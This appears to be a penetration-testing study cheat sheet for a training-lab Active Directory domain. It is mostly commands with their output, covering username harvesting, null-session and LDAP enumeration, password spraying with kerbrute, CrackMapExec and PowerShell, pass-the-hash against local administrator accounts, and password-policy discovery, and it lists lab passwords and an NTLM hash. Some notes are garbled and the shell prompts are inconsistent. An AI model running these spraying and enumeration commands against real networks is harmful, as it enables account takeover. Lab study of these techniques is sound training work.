Internal Password Spraying Attack

Domain Name: INLANEFREIGHT.LOCAL
Domain Controller (DC): 172.16.5.5
Target Subnet: 172.16.5.0/23

Making Target List

OSINT LinkedIn Scraping

C:\mrci0x1> linkedin2username -c Inlanefreight -o linkedin_usernames.txt

[+] Output saved to linkedin_usernames.txt

OSINT Email Harvesting

C:\mrci0x1> intext:"@inlanefreight.com" site:inlanefreight.com

Combine Username Lists

C:\mrci0x1> cat jsmith.txt linkedin_usernames.txt > combined_usernames.txt

Metadata Analysis

C:\mrci0x1> exiftool *.pdf > metadata.txt

Generate Username Combinations

#!/bin/bash
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do
    echo $x
done > guid_usernames.txt

Created username combinations

now we can make good list based the the users we found based the organization that based based on the first and last name by atomated tools

$ username-generator -w site_users > user_gen.lst
$ username-anarchy -i site_users >> user_gen.lst

# deduplicated the generated user list

$ sort user_gen.lst | uniq > user_combined.lst

User Enumeration via Kerbrute

C:\mrci0x1> kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 combined_usernames.txt -o valid_users.txt

[+] VALID USERNAME: jjones@inlanefreight.local
[+] VALID USERNAME: sbrown@inlanefreight.local
[+] VALID USERNAME: tjohnson@inlanefreight.local

Incorporate Breach Data

C:\mrci0x1> echo "roger.grimes" >> valid_users.txt

SMB Null Sessions enum4linux

C:\mrci0x1> enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt
lab_adm
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
ccruz
njohnson
mholliday

SMB Null Sessions rpcclient

C:\mrci0x1> rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers

user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]
user:[avazquez] rid:[0x458]

SMB Null Sessions CrackMapExec

C:\mrci0x1> crackmapexec smb 172.16.5.5 --users

INLANEFREIGHT.LOCAL\administrator
INLANEFREIGHT.LOCAL\guest
INLANEFREIGHT.LOCAL\lab_adm
INLANEFREIGHT.LOCAL\htb-student
INLANEFREIGHT.LOCAL\avazquez

LDAP Anonymous Bind ldapsearch

C:\mrci0x1> ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

guest
ACADEMY-EA-DC01$
htb-student
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch

LDAP Anonymous Bind windapsearch

C:\mrci0x1> ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Found: DC=INLANEFREIGHT,DC=LOCAL
Found 2906 users:
Guest
Htb Student
Annie Vazquez
Paul Falcon
Fae Anthony
Walter Dillard

Credentialed Enumeration CrackMapExec

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

INLANEFREIGHT.LOCAL\administrator badpwdcount: 1
INLANEFREIGHT.LOCAL\guest badpwdcount: 0
INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0
INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0
INLANEFREIGHT.LOCAL\avazquez badpwdcount: 20
INLANEFREIGHT.LOCAL\pfalcon badpwdcount: 0

Password Attacks

Kerbrute Password Spray

C:\mrci0x1> kerbrute passwordspray -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 valid_users.txt Welcome1 -o spray_results.txt

VALID CREDENTIALS: bob.smith@inlanefreight.local:Welcome1
VALID CREDENTIALS: john.doe@inlanefreight.local:Welcome1

CrackMapExec Password Spray

C:\mrci0x1> crackmapexec smb 172.16.5.0/23 -u valid_users.txt -p passwords.txt --no-bruteforce > cme_spray_results.txt

INLANEFREIGHT.LOCAL\bob.smith:Welcome1
INLANEFREIGHT.LOCAL\john.doe:Welcome1

rpcclient Password Spray

C:\mrci0x1> for u in $(cat valid_users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHT

CrackMapExec Validate Credentials

C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

INLANEFREIGHT.LOCAL\avazquez:Password123

CrackMapExec Password Spray (Local Administrator Accounts using NTLM hash)

C:\mrci0x1> sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)

DomainPasswordSpray (PowerShell)

PS C:\mrci0x1> Import-Module .\DomainPasswordSpray.ps1
PS C:\mrci0x1> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

SUCCESS! User:sgage Password:Welcome1
SUCCESS! User:tjohnson Password:Welcome1

Kerbrute Password Spray (Windows)

PS C:\mrci0x1> .\kerbrute.exe passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

VALID LOGIN: sgage@inlanefreight.local:Welcome1

Password Policy Enumeration

CrackMapExec (Credentialed Enumeration - Linux)

C:\mrci0x1> crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

Minimum password length: 8
Password history length: 24
Maximum password age: Not Set
Password Complexity Flags: 000001
Domain Password Complex: 1
Minimum password age: 1 day 4 minutes 
Reset Account Lockout Counter: 30 minutes 
Locked Account Duration: 30 minutes 
Account Lockout Threshold: 5

rpcclient (Non-Credentialed Enumeration - Linux)

C:\mrci0x1> rpcclient -U "" -N 172.16.5.5
rpcclient $> querydominfo

Total Users: 3650
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC

enum4linux (Non-Credentialed Enumeration - Linux)

C:\mrci0x1> enum4linux -P 172.16.5.5

Minimum password length: 8
Password history length: 24
Maximum password age: Not Set
Password Complexity Flags: 000001
Minimum password age: 1 day 4 minutes 
Reset Account Lockout Counter: 30 minutes 
Locked Account Duration: 30 minutes 
Account Lockout Threshold: 5

enum4linux-ng (Non-Credentialed Enumeration - Linux)

C:\mrci0x1> enum4linux-ng -P 172.16.5.5 -oA ilfreight

min_pw_length: 8
pw_history_length: 24
min_pw_age: 1 day 4 minutes
max_pw_age: not set
pw_properties: DOMAIN_PASSWORD_COMPLEX: true
lockout_threshold: 5
lockout_duration: 30 minutes
lockout_observation_window: 30 minutes

ldapsearch (Non-Credentialed Enumeration - Linux)

C:\mrci0x1> ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

lockoutThreshold: 5
minPwdLength: 8
pwdHistoryLength: 24
minPwdAge: -864000000000
maxPwdAge: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000

net.exe (Credentialed Enumeration - Windows)

PS C:\mrci0x1> net accounts

Minimum password age (days): 1
Maximum password age (days): Unlimited
Minimum password length: 8
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30

PowerView (Credentialed Enumeration - Windows)

PS C:\mrci0x1> Import-Module .\PowerView.ps1
PS C:\mrci0x1> Get-DomainPolicy

MinimumPasswordAge=1
MaximumPasswordAge=-1
MinimumPasswordLength=8
PasswordComplexity=1
PasswordHistorySize=24
LockoutBadCount=5
ResetLockoutCount=30
LockoutDuration=30

net use SMB NULL Session (Non-Credentialed Enumeration - Windows)

PS C:\mrci0x1> net use \\DC01\ipc$ "" /u:""

The command completed successfully.

PreviousLLMNR/NBT-NS & Spraying for AD Access NextCredentialed Enumeration

Last updated 1 month ago